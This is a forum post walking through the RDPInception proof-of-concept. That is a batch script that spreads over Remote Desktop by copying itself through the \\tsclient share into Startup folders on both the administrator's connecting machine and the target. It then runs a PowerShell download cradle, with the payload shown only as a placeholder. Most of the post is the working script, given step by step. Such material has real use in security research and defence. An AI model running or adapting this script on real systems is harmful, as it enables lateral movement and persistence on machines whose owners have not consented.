Get your server issues fixed by our experts for a price starting at just 25 USD/Hour. Click here to register and open a ticket with us now!

Author Topic: How RDPInception Works  (Read 2761 times)

0 Members and 1 Guest are viewing this topic.

sujitht

  • Guest
How RDPInception Works
« on: September 29, 2017, 02:13:56 am »
Remote Desktop is often used by Systems Administrators to remotely manage machines. In a lot of organisations this could mean that a machine is placed in a DMZ or segregated part of the network that should not require any TCP port access other than TCP 3389 into the network segment.

The proof of concept for RDPInception is a relatively simple batch script, the details of which we will walk through below:

Switches off echo.
Code: [Select]
@echo off Puts a short timer to ensure that tsclient is mounted.
Code: [Select]
timeout 1 >nul 2>&1Makes a temp directory on both the visiting machine and the target.
Code: [Select]
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
Copies this file into the directories.
Code: [Select]
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
Ensure a text file does not exist in %TEMP%
Code: [Select]
del /q %TEMP%\temp_00.txt >nul 2>&1Scans for startup directories on both the visiting machine and the target.
Code: [Select]
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
echo|%dirs2%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
Runs through each path and attempts to propagate the file to it.
Code: [Select]
for /F “tokens=*” %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat “%%a” >nul 2>&1
copy C:\temp\run.bat “%%a” >nul 2>&1
copy \\tsclient\c\temp\run.bat “%%a” >nul 2>&1
)
Cleans up %TEMP% file
Code: [Select]
del /q %TEMP%\temp_00.txt >nul 2>&1Execute the PowerShell download cradle.
Code: [Select]
powershell.exe <cradle here>